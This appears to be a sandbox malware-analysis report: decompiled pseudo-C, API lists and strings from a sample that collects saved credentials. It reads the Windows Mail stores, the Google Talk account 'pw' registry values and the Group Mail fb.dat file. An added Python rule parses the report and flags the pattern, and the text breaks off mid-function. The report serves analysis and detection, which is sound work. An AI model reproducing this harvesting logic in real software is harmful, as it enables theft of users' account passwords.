                                                                                                                                                    								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                                                                                                                                                    									goto L4;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t57 = 0;
                                                                                                                                                    									__eflags =  *(_t65 + 0xf8);
                                                                                                                                                    									L9:
                                                                                                                                                    									_t9 = __eflags != 0;
                                                                                                                                                    									__eflags = _t9;
                                                                                                                                                    									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								goto L4;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				 *(_t71 - 4) = 0;
                                                                                                                                                    				__set_app_type(2);
                                                                                                                                                    				 *0x417b6c =  *0x417b6c | 0xffffffff;
                                                                                                                                                    				 *0x417b70 =  *0x417b70 | 0xffffffff;
                                                                                                                                                    				_t35 = __p__fmode();
                                                                                                                                                    				_t62 =  *0x416b8c; // 0x0
                                                                                                                                                    				 *_t35 = _t62;
                                                                                                                                                    				_t36 = __p__commode();
                                                                                                                                                    				_t63 =  *0x416b88; // 0x0
                                                                                                                                                    				 *_t36 = _t63;
                                                                                                                                                    				 *0x417b68 =  *_adjust_fdiv;
                                                                                                                                                    				_t39 = E00401A4D();
                                                                                                                                                    				_t79 =  *0x416000; // 0x1
                                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                                    					__setusermatherr(E00401A4D);
                                                                                                                                                    					_pop(_t63);
                                                                                                                                                    				}
                                                                                                                                                    				E0041182C(_t39);
                                                                                                                                                    				_push(0x4123b0);
                                                                                                                                                    				_push(0x4123ac);
                                                                                                                                                    				L00411826();
                                                                                                                                                    				_t41 =  *0x416b84; // 0x0
                                                                                                                                                    				 *(_t71 - 0x20) = _t41;
                                                                                                                                                    				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
                                                                                                                                                    				_push(0x4123a8);
                                                                                                                                                    				_push(0x412394); // executed
                                                                                                                                                    				L00411826(); // executed
                                                                                                                                                    				_t69 =  *_acmdln;
                                                                                                                                                    				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                                                                                    				if( *_t69 != 0x22) {
                                                                                                                                                    					while(1) {
                                                                                                                                                    						__eflags =  *_t69 - 0x20;
                                                                                                                                                    						if(__eflags <= 0) {
                                                                                                                                                    							goto L17;
                                                                                                                                                    						}
                                                                                                                                                    						_t69 = _t69 + 1;
                                                                                                                                                    						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					do {
                                                                                                                                                    						_t69 = _t69 + 1;
                                                                                                                                                    						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                                                                                    						_t55 =  *_t69;
                                                                                                                                                    					} while (_t55 != 0 && _t55 != 0x22);
                                                                                                                                                    					if( *_t69 == 0x22) {
                                                                                                                                                    						L16:
                                                                                                                                                    						_t69 = _t69 + 1;
                                                                                                                                                    						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				L17:
                                                                                                                                                    				_t48 =  *_t69;
                                                                                                                                                    				if(_t48 != 0 && _t48 <= 0x20) {
                                                                                                                                                    					goto L16;
                                                                                                                                                    				}
                                                                                                                                                    				 *(_t71 - 0x4c) = 0;
                                                                                                                                                    				GetStartupInfoA(_t71 - 0x78);
                                                                                                                                                    				_t87 =  *(_t71 - 0x4c) & 0x00000001;
                                                                                                                                                    				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
                                                                                                                                                    					_t50 = 0xa;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
                                                                                                                                                    				}
                                                                                                                                                    				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
                                                                                                                                                    				_t70 = _t52;
                                                                                                                                                    				 *(_t71 - 0x7c) = _t70;
                                                                                                                                                    				if( *(_t71 - 0x1c) == 0) {
                                                                                                                                                    					exit(_t70); // executed
                                                                                                                                                    				}
                                                                                                                                                    				__imp___cexit();
                                                                                                                                                    				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                                                                                                    				return E00411879(_t70);
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3662548030-0
                                                                                                                                                    • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                                                                                    • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                                                                                    • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                                                                                    • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E00410D1B(void* __eflags, intOrPtr _a4) {
                                                                                                                                                    				void _v275;
                                                                                                                                                    				char _v276;
                                                                                                                                                    				char _v532;
                                                                                                                                                    				void _v539;
                                                                                                                                                    				char _v540;
                                                                                                                                                    				void _v795;
                                                                                                                                                    				char _v796;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				int _t44;
                                                                                                                                                    				char* _t46;
                                                                                                                                                    				char* _t48;
                                                                                                                                                    				void* _t64;
                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				signed int _t68;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    
                                                                                                                                                    				_t75 = __eflags;
                                                                                                                                                    				_v796 = 0;
                                                                                                                                                    				memset( &_v795, 0, 0x104);
                                                                                                                                                    				_t64 = 0x1c;
                                                                                                                                                    				_t61 =  &_v796;
                                                                                                                                                    				 *((intOrPtr*)(_a4 + 4)) = 1;
                                                                                                                                                    				E0040EE59( &_v796, _t64); // executed
                                                                                                                                                    				E00406734( &_v796, "\\Microsoft\\Windows Mail");
                                                                                                                                                    				_t65 = _a4;
                                                                                                                                                    				E00410C43(_t65, _t75, _t61); // executed
                                                                                                                                                    				 *((intOrPtr*)(_t65 + 4)) = 2;
                                                                                                                                                    				_t66 = 0x1c;
                                                                                                                                                    				E0040EE59(_t61, _t66);
                                                                                                                                                    				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
                                                                                                                                                    				E00410C43(_a4, _t75, _t61); // executed
                                                                                                                                                    				_v276 = 0;
                                                                                                                                                    				memset( &_v275, 0, 0x104);
                                                                                                                                                    				_v540 = 0;
                                                                                                                                                    				memset( &_v539, 0, 0x104);
                                                                                                                                                    				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                                                                                                                    				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
                                                                                                                                                    				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
                                                                                                                                                    				_t44 = strlen( &_v540);
                                                                                                                                                    				if(_t44 > 0) {
                                                                                                                                                    					_t48 = _t74 + _t44 + 0x117;
                                                                                                                                                    					if( *_t48 == 0x5c) {
                                                                                                                                                    						 *_t48 = 0;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_push( &_v532);
                                                                                                                                                    				_t46 =  &_v796;
                                                                                                                                                    				_push(_t46);
                                                                                                                                                    				L004115B2();
                                                                                                                                                    				_t78 = _t46;
                                                                                                                                                    				if(_t46 != 0) {
                                                                                                                                                    					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
                                                                                                                                                    				}
                                                                                                                                                    				return _t46;
                                                                                                                                                    			}
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00410D3C
                                                                                                                                                      • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                                                                                      • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                                                                                      • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                                                                      • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                                                                                      • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                                                                                      • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                                                                    • memset.MSVCRT ref: 00410DAA
                                                                                                                                                    • memset.MSVCRT ref: 00410DC5
                                                                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                                                                                    • strlen.MSVCRT ref: 00410E0C
                                                                                                                                                    • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                                                                                    Strings
                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                                                                                    • Store Root, xrefs: 00410DD6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                    • API String ID: 4071991895-2578778931
                                                                                                                                                    • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                                                                                    • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                                                                                    • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                                                                                    • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                                                                                                                    				char _v276;
                                                                                                                                                    				char _v404;
                                                                                                                                                    				intOrPtr _v408;
                                                                                                                                                    				char _v792;
                                                                                                                                                    				intOrPtr _v796;
                                                                                                                                                    				char _v924;
                                                                                                                                                    				char _v936;
                                                                                                                                                    				void _v1959;
                                                                                                                                                    				char _v1960;
                                                                                                                                                    				void _v2983;
                                                                                                                                                    				char _v2984;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t28;
                                                                                                                                                    				void* _t50;
                                                                                                                                                    				void* _t51;
                                                                                                                                                    				char* _t59;
                                                                                                                                                    				char* _t63;
                                                                                                                                                    				void* _t70;
                                                                                                                                                    
                                                                                                                                                    				_t70 = __fp0;
                                                                                                                                                    				_t51 = __ecx;
                                                                                                                                                    				_v1960 = 0;
                                                                                                                                                    				memset( &_v1959, 0, 0x3ff);
                                                                                                                                                    				_v2984 = 0;
                                                                                                                                                    				memset( &_v2983, 0, 0x3ff);
                                                                                                                                                    				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                    					return _t28;
                                                                                                                                                    				}
                                                                                                                                                    				E004021D8( &_v936);
                                                                                                                                                    				_push( &_v1960);
                                                                                                                                                    				_t50 = 0x7f;
                                                                                                                                                    				E004060D0(_t50,  &_v276);
                                                                                                                                                    				_t59 =  &_v404;
                                                                                                                                                    				E004060D0(_t50, _t59,  &_v2984);
                                                                                                                                                    				_v796 = 9;
                                                                                                                                                    				_v408 = 3;
                                                                                                                                                    				_t63 = strchr(_t59, 0x40);
                                                                                                                                                    				_push( &_v404);
                                                                                                                                                    				if(_t63 == 0) {
                                                                                                                                                    					if(strlen() + 0xa < 0) {
                                                                                                                                                    						sprintf( &_v792, "%s@yahoo.com",  &_v404);
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					strcpy( &_v792, ??);
                                                                                                                                                    					 *_t63 = 0;
                                                                                                                                                    				}
                                                                                                                                                    				strcpy( &_v924,  &_v404);
                                                                                                                                                    				return E00402407( &_v936, _t70, _a4);
                                                                                                                                                    			}

APIs
• memset.MSVCRT ref: 004037D2
• memset.MSVCRT ref: 004037E6
  • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
  • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
• strchr.MSVCRT ref: 00403855
• strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
• strlen.MSVCRT ref: 0040387E
• sprintf.MSVCRT ref: 0040389E
• strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$strcpystrlen$Closememcpysprintfstrchr
• String ID: %s@yahoo.com
• API String ID: 1649821605-3288273942
• Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
• Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
• Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
• Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 317 4034cb-40352b memset * 2 call 40ebc1 320 403567-403569 317->320 321 40352d-403566 strcpy call 405f1f strcat call 4033d7 317->321 321->320
C-Code - Quality: 100%
			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}

APIs
• memset.MSVCRT ref: 004034EB
• memset.MSVCRT ref: 00403501
  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
• strcpy.MSVCRT(00000000,00000000), ref: 0040353C
  • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
  • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
• strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memsetstrcat$Closestrcpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 1387626053-966475738
• Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
• Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
• Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
• Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 96%
			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}
                                                                                                                                                    0x0040763d
                                                                                                                                                    0x00407651
                                                                                                                                                    0x00407651
                                                                                                                                                    0x00407658

APIs
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
  • Part of subcall function 0040724C: GetComputerNameA.KERNEL32(?,?), ref: 00407313
  • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
  • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
• memset.MSVCRT ref: 0040759B
  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
• memset.MSVCRT ref: 004075EC
• RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
• RegCloseKey.ADVAPI32(?), ref: 00407651
Strings
• Software\Google\Google Talk\Accounts, xrefs: 0040756C
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 2959138223-1079885057
• Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
• Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
• Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
• Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
Uniqueness

Uniqueness Score: -1.00%
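The API and string entries above describe a credential-harvesting routine: the function references the registry path Software\Google\Google Talk\Accounts, opens a key and enumerates its subkeys (RegOpenKeyExA / RegEnumKeyExA), and its subcall at 0040724C collects the computer name and user name. The following Python is an added example written for this page, not Joe Sandbox or sample code: it parses the report's "APIs" and "Strings" bullet format into records and runs a small rule over them that flags this pattern. The input is the set of lines printed above, copied into a raw string; the W-suffixed API names in the rule are an assumption to generalise it, since the page shows only the A forms.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the 'APIs' and 'Strings' entries printed above for the
# function ending at 0x00407658, copied into a raw string (backslashes literal).
SAMPLE_DUMP = r"""
APIs
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
  • Part of subcall function 0040724C: GetComputerNameA.KERNEL32(?,?), ref: 00407313
  • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
  • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
  • memset.MSVCRT ref: 0040759B
  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
  • memset.MSVCRT ref: 004075EC
  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
  • RegCloseKey.ADVAPI32(?), ref: 00407651
Strings
  • Software\Google\Google Talk\Accounts, xrefs: 0040756C
"""

# One 'APIs' bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# then Name.MODULE, optional "(args)", then "ref: XXXXXXXX".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# One 'Strings' bullet: the value, then "xrefs: XXXXXXXX".
STR_RE = re.compile(r"^\s*•\s*(?P<value>.+?),\s*xrefs?:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int                 # call-site address
    subcall: Optional[int]   # address of the sub-function the call belongs to, if any


@dataclass(frozen=True)
class StringRef:
    value: str
    xref: int


def parse_dump(text: str) -> Tuple[List[ApiCall], List[StringRef]]:
    """Walk the dump line by line, switching parser on the 'APIs' / 'Strings' headings."""
    calls: List[ApiCall] = []
    strings: List[StringRef] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("APIs", "Strings"):
            section = line
            continue
        if not line.startswith("•"):      # any other heading ends the current section
            section = None
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unparsed API line: {line}")
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
            calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings":
            m = STR_RE.match(line)
            if not m:
                raise ValueError(f"unparsed string line: {line}")
            strings.append(StringRef(m["value"], int(m["ref"], 16)))
    return calls, strings


# Registry paths under which an IM / mail client keeps per-account records.
# Only the Google Talk path is attested on this page; anything added here is the analyst's own.
ACCOUNT_STORE_PATHS = (r"Software\Google\Google Talk\Accounts",)
REG_OPEN = {"RegOpenKeyExA", "RegOpenKeyExW"}   # W variants are an assumption; the page shows the A forms
REG_ENUM = {"RegEnumKeyExA", "RegEnumKeyExW"}
IDENTITY = {"GetUserNameA", "GetUserNameW", "GetComputerNameA", "GetComputerNameW"}


def find_credential_enumeration(calls: List[ApiCall], strings: List[StringRef]) -> Optional[dict]:
    """Flag the pattern shown above: an account-store key string plus registry open and
    subkey enumeration. User / computer name collection is reported as context."""
    names = {c.name for c in calls}
    stores = [s for s in strings
              if any(s.value.lower().startswith(p.lower()) for p in ACCOUNT_STORE_PATHS)]
    if not stores or not (REG_OPEN & names) or not (REG_ENUM & names):
        return None
    return {
        "store": stores[0].value,
        "xref": f"{stores[0].xref:08X}",
        "registry_apis": sorted((REG_OPEN | REG_ENUM) & names),
        "identity_apis": sorted(IDENTITY & names),
        "subcalls": sorted({f"{c.subcall:08X}" for c in calls if c.subcall is not None}),
    }


if __name__ == "__main__":
    parsed_calls, parsed_strings = parse_dump(SAMPLE_DUMP)
    print(find_credential_enumeration(parsed_calls, parsed_strings))
```

The parser raises on a bullet it cannot read inside an APIs or Strings section, so a change in the report format is noticed rather than silently dropping calls; the rule keys on the string xref and the registry API pair rather than on a single API name, which is what distinguishes account harvesting from the ordinary Shell Folders lookup also visible in the same listing.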

Control-flow Graph (basic blocks and edges recovered from the graph source; the Executed / Not Executed colouring of the original image is not preserved in text)
  349: 40a5ac-40a5be -> 350, 351
  350: 40a5c0-40a5d6 (call 406deb; _mbsicmp) -> 356, 357
  351: 40a60b-40a61f (call 405e2c) -> 373, 374, 375, 376, 377
  356: 40a5d8-40a5f1 (call 406deb) -> 362, 363
  357: 40a5ff-40a609 -> 350, 351
  358: 40a624-40a637 (call 406dfb) -> 366, 367
  362: 40a5f3-40a5f6 -> 365
  363: 40a5f8 -> 365
  365: 40a5f9-40a5fa (call 40a119) -> 357
  366: 40a639-40a645 -> 369, 370
  367: 40a67e-40a68d (SetCursor)
  369: 40a647-40a652 -> 370
  370: 40a65c-40a67b (qsort) -> 367
  373: 40a621 (call 4047a0) -> 358
  374: 40a621 (call 4047f1) -> 358
  375: 40a621 (call 40e894) -> 358
  376: 40a621 (call 403c3d) -> 358
  377: 40a621 (call 40eb3f) -> 358
  (the single call site at 40a621 is resolved to five candidate targets, blocks 373 to 377)
C-Code - Quality: 64%
			// Editor's comments (added; not decompiler output). __eax is the tool's main object:
			// +0x37c holds the argument list (entry count at +0x30), +0x370 the item list that is
			// sorted below. The loop scans the arguments for "/sort <column>"; the code after it
			// sorts the items unless "/nosort" was given.
			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);                 // argument number _t47
						_push(_t31);
						_push("/sort");
						L004115C4();                                   // _mbsicmp thunk (CFG block 40a5c0-40a5d6): case-insensitive compare
						if(_t31 == 0) {                                // decompiler reuses _t31 for the compare result
							_t4 = _t47 + 1; // 0x1
